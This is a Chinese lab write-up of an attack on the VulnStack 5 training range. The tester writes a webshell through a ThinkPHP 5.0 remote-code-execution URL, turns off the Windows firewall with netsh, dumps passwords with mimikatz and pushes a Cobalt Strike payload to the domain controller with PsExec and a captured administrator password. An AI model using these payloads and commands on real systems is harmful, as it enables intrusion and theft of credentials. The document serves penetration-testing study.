1.环境搭建

靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/
win7(双网卡):
192.168.135.150(外网)
192.168.138.136(内网)
外网使用NAT模式,内网仅主机模式。

win2008:

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

2.外网信息收集

2.1访问目标网站发现是个TP框架的站。

红日VulnStack(5)靶机实战 Safe 第1张

2.2版本判断

通过报错得知TP的详细版本
红日VulnStack(5)靶机实战 Safe 第2张

2.3进行目录扫描

红日VulnStack(5)靶机实战 Safe 第3张

拿服务器权限

1.当我们确认框架和具体版本后,就可以寻找框架对应的历史漏洞poc。

ThinkPhp5.0任意代码执行:https://www.cnblogs.com/backlion/p/10106676.html

2.尝试写入shell

http://192.168.135.150/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_GET["code"]);?^>>shell.php
成功的话会写入到public目录下,然后访问一下shell.php就拿蚁剑连接。
红日VulnStack(5)靶机实战 Safe 第4张
然后就进入到我们的内网了

3.内网信息收集

1.查看一下权限

红日VulnStack(5)靶机实战 Safe 第5张
如果权限较低的话就要提权,可以systeminfo查看补丁信息然后寻找对应的EXP进行提权。
红日VulnStack(5)靶机实战 Safe 第6张

3.1存活主机

4横向渗透

4.1先打开Cobalt Strike然后让win7上线

红日VulnStack(5)靶机实战 Safe 第7张

4.2minikatz尝试读取密码

红日VulnStack(5)靶机实战 Safe 第8张

4.3找域控制器

内网扫描存活主机
红日VulnStack(5)靶机实战 Safe 第9张
ipconfig -all 发现DNS后缀为sun.com这一般是域控制器的域名
红日VulnStack(5)靶机实战 Safe 第10张
ping一下得到ip
红日VulnStack(5)靶机实战 Safe 第11张
就可以确定192.168.138.138的主机就是域控制器了

5拿域控

5.1提权

先把win7的administrator权限提升为system,这里使用烂土豆,成功提权SYStem

红日VulnStack(5)靶机实战 Safe 第12张

5.2psexec传递

因为域控是不与外网进行接触的,所以要先在已经上线的主机上建立一个listen

红日VulnStack(5)靶机实战 Safe 第13张
红日VulnStack(5)靶机实战 Safe 第14张

然后生成一个Executable(S)木马,上传到win7上

红日VulnStack(5)靶机实战 Safe 第15张

因为自带的psexec只可以在目标可以访问外网的情况下使用所以这我们还要自己上传一个psexec.exe

红日VulnStack(5)靶机实战 Safe 第16张

因为win7的防火墙缘故,7777端口是进不去的可以,关闭防火墙:NetSh Advfirewall set allprofiles state off ,或者添加规则来放行7777端口

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=7777
红日VulnStack(5)靶机实战 Safe 第17张

最后使用上传的psexec加上抓取的明文密码配合exe成功上线域控。

Shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138 -u sun\Administrator -p WW123123ww. -d -c C:\phpStudy\PHPTutorial\WWW\public\nei.exe
(psexec的用法)[https://blog.csdn.net/jamesdodo/article/details/81743224]
红日VulnStack(5)靶机实战 Safe 第18张
红日VulnStack(5)靶机实战 Safe 第19张

总结:
先说遇到的坑:system的权限读取密码和执行psexec老报错,administrator就很顺利,不晓得是靶机的问题还是我自己搭建的环境有问题。
充环境搭建到域控上线用了两天太菜了,不过好在学到了一些东西,加油!!

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄